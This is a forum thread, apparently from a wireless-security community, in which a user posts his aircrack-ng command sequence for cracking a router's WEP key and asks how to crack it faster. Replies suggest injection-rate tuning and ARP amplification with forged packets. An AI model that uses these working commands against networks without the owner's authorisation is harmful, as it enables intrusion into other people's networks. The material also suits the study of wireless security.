How far away from the router are you, what kind of signal level do you have and what is the signal quality.
All of those will affect the speed.
There are other things, but it is best to start with us knowing the basics first.
so ive crack "my" linksys router's wep encoding in about 20 min,but i see alot of people are doing it in about 10 min or less so can anyone tell me how to obtain or generate more data faster
im using a compaq armada m700 series laptop with a net gear notebook card WG511T
my comands are these
airmon-ng start wifi0-------starts madwifi and puts the card into monitor mode ath1
airodump-ng --channel 6 --bssid **:**:**:**:**(mac of target) -w capture ath1
aireplay-ng -3 -b **:**:**:**:**(target mac) -h **:**:**:**:**(my mac) ath1
aireplay-ng -1 6000 -e Joe(name of my router) -a **:**:**:**:**(target mac) -h **:**:**:**:**(my mac)
aireplay-ng -0 10 -a **:**:**:**:**(target mac) -h **:**:**:**:**(my mac)
aircrack-ng -n 64 capture-01.cap
so can anyone help are there any tweaks with the command line i could do ???
sorry but im kinda new at this![]()
How far away from the router are you, what kind of signal level do you have and what is the signal quality.
All of those will affect the speed.
There are other things, but it is best to start with us knowing the basics first.
ok well like i said its my router so im relatively close to it.....soo um about 8 feet
try this
do a bitrate injtest
aireplay-ng --test 'CARDNAME' -B
find the higher rate wich give 100 % or the highest value you can get......
change your card to this rate before attack
and add this switch to your aireplay-ng arp replay attack
-x 1024
this changes the default packet number wich is send by the attack (def = 500)
after the next thing i can advise is if you got also a client ...... is ARP AMPLIFICATION
chopchop a packet
read the decrypted packet (xxx-dec.cap ) in tcpdump or wireshark in order to get the client ip
build a forged packet with client ip as destination and 255.255.255.10 as source ip
replay the new arp .......
enjoy rates up to 1200 IVs /secs ......
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
You also need to tell us what version of the software that you are using.
How fast are the IVs coming in?
How many IVs did it take to crack the key?
ok thanks guys for responding so fast
but umm i ran the atack again today and i switched the order i did them (because i read somewhere today,that sometimes it depends on your order too)
and i got the 64-bit key in a little less then 6 min
thanks though
i will rerun the attack with the options you provided and lets see if i can get it faster XD
When you inject how many IV's/second is Airodump collecting?